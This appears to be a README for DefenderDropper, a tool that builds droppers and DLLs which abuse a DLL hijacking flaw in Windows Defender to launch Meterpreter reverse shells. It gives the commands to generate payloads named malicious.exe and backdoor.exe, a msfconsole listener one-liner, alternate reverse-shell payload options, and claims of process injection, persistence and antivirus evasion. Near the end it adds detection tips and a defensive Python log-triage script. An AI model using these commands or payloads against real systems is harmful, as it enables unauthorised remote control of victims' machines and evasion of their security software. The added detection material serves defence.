Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities
DefenderDropper is an advanced payload generation tool that leverages the DLL hijacking vulnerability in Windows Defender, originally discovered by TwoSevenOneT. This tool automates the creation of sophisticated payloads that bypass security controls by hijacking legitimate Windows Defender processes.
Inspired by: TwoSevenOneT/DefenderWrite
- Windows Defender Exploitation: Leverages DLL hijacking in Windows Defender
- Automated Payload Generation: Creates ready-to-use droppers and DLLs
- Metasploit Integration: Seamless integration with Meterpreter payloads
- Static Compilation: No external dependencies required
- Stealth Execution: Runs through legitimate system processes
- Multiple Payload Support: Various reverse shell and Meterpreter options
```bash
# Install dependencies on Debian/Kali
sudo apt update
sudo apt install python3 metasploit-framework mingw-w64 -y
git clone https://github.com/HackScaleTeam/DefenderDropper.git
cd DefenderDropper
python3 defenderdropper.py 10.0.2.147 4443 -o malicious.exe
msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST 10.0.2.147; set LPORT 4443; exploit'
```
- Download DefenderWrite.exe if not installed from: https://github.com/TwoSevenOneT/DefenderWrite
- On Windows VM, place these 3 files in the SAME directory:
  - {exe_name}
  - {dll_name}
  - DefenderWrite.exe
- Start listener:
  msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST {args.LHOST}; set LPORT {args.LPORT}; exploit'
- Run {exe_name} as Administrator on Windows VM
Technical Overview
- DLL Hijacking: Exploits Windows Defender's vulnerable update process
- Process Injection: Injects shellcode into legitimate system processes
- Persistence: Leverages trusted Windows components for execution
- Evasion: Bypasses common security controls and antivirus solutions
DefenderDropper/
├── defenderdropper.py # Main payload generator
├── payload.exe # Generated dropper
├── payload.dll # Shellcode DLL
├── DefenderWrite.exe # Core exploit tool
├── README.md
└── LICENSE
Basic Meterpreter Payload
```bash
python3 defenderdropper.py 192.168.1.100 4444 -o backdoor.exe
```
Custom Payloads
You can use a different Metasploit payload by modifying the generate_shellcode() function: in defenderdropper.py, search for windows/x64/meterpreter_reverse_tcp and replace it with one of the following:
"-p", "windows/x64/shell_reverse_tcp", # Simple reverse shell
"-p", "windows/meterpreter/reverse_https", # HTTPS payload
"-p", "windows/x64/meterpreter/reverse_tcp", # Standard Meterpreter
Detection
- Monitor for unusual msiexec.exe child processes
- Watch for DLL files in the Windows Defender directory
- Analyze process hollowing techniques
- Keep Windows Defender updated
- Implement application whitelisting
- Use advanced endpoint protection
- Regular security audits
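As an added, defender-side example that is not part of the DefenderDropper project: a small triage script that applies the first two detection ideas above (unusual msiexec.exe children, DLLs written into the Windows Defender directory) to constructed, simplified telemetry lines. The log format, the lab paths and the Defender install directories it watches are assumptions for this example, not values from the tool.

```python
from typing import Dict, List

# Constructed sample telemetry (not real Sysmon/EDR output). Pipe-delimited fields:
#   event | acting process image | related path
# where "related path" is the parent image for ProcessCreate and the written file for FileCreate.
SAMPLE_EVENTS = [
    "ProcessCreate|C:\\Windows\\System32\\msiexec.exe|C:\\Windows\\System32\\svchost.exe",
    "ProcessCreate|C:\\Windows\\System32\\msiexec.exe|C:\\Windows\\System32\\msiexec.exe",
    "ProcessCreate|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\msiexec.exe",
    "FileCreate|C:\\Users\\lab\\Desktop\\payload.exe|C:\\Program Files\\Windows Defender\\payload.dll",
    "FileCreate|C:\\Users\\lab\\Desktop\\setup.exe|C:\\Users\\lab\\AppData\\Local\\Temp\\x.dll",
]

# Assumed Windows Defender install locations to watch (case-insensitive prefix match).
DEFENDER_DIRS = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_defender_dir(path: str) -> bool:
    return path.lower().startswith(DEFENDER_DIRS)


def check_event(event: str, image: str, related: str) -> List[str]:
    """Return the names of the rules that fire for one event (empty if none)."""
    hits: List[str] = []
    if event == "ProcessCreate":
        # Rule 1: a child of msiexec.exe whose image is not itself msiexec.exe.
        # Installers with custom actions may need additions to this allowlist.
        if basename(related) == "msiexec.exe" and basename(image) != "msiexec.exe":
            hits.append("unusual_msiexec_child")
    elif event == "FileCreate":
        # Rule 2: a DLL written under a Defender directory by a process that does not
        # live there. Tune for legitimate platform-update processes in your estate.
        if related.lower().endswith(".dll") and in_defender_dir(related) and not in_defender_dir(image):
            hits.append("dll_written_to_defender_dir")
    return hits


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    alerts: List[Dict[str, str]] = []
    for line in lines:
        parts = line.split("|")
        if len(parts) != 3:
            continue  # malformed line: skip rather than crash on messy real telemetry
        event, image, related = parts
        for rule in check_event(event, image, related):
            alerts.append({"rule": rule, "image": image, "related": related})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['image']} -> {alert['related']}")
```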
This tool is intended for:
- Security research
- Penetration testing with proper authorization
- Educational purposes
- Red team exercises
Illegal use of this tool is strictly prohibited. The developers are not responsible for any misuse or damage caused by this tool. Always ensure you have explicit permission before testing any systems.
We welcome contributions from the security community! Feel free to:
- Fork the repository
- Create feature branches
- Submit pull requests
- Report issues and suggestions
- TwoSevenOneT for the original DefenderWrite research
- The cybersecurity community for continuous improvement
This project is licensed under the MIT License - see the LICENSE file for details.
Security is a shared responsibility. Use this tool wisely and ethically.
Built with ❤️ for the cybersecurity community. Inspired by groundbreaking research from TwoSevenOneT.